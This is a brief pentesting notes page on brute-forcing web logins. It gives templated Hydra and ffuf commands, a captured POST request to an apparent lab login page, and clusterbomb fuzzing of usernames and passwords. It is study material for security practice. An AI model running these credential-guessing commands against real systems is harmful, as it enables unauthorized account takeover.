Authentication Attacks

Brute Force

Burpsuite

Grabbing the POST request in the http history under the proxy and sending that to intruder is an easy way to manage this. You will be throttled on the community edition

Hydra

hydra -l [login] -P [pass list] [target] -s [port] http-post-form "/[endpoint.ext]:[userparam]=^USER^&[passparam]=^PASS^:F=[failure string]"

FFUF

Taking the POST request from BurpSuite and making a file out of it to feed to ffuf works great, replacing the target with the FUZZ operator:

POST /labs/a0x01.php HTTP/1.1
Host: 100.79.20.39
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://100.79.20.39
Connection: keep-alive
Referer: http://100.79.20.39/labs/a0x01.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=jeremy&password=FUZZ

Then, run ffuf using the request:

ffuf -request [req file] -request-proto http -w [wordlist] -fs [failure page size]

We can also use multiple FUZZ operators in our request file:

[...]
username=FUZZUSER&password=FUZZPASS
[...]

And use clusterbomb mode:

ffuf -request [req file] -request-proto http -mode clusterbomb -w [wordlist]:FUZZPASS -w [usernames]:FUZZUSER -fs [failure page size]

MFA

Things like this need to be looked at logically. Try to find any flaws in the flow

PreviousInsecure File Upload NextXXE & XSLT Injection

Last updated 1 day ago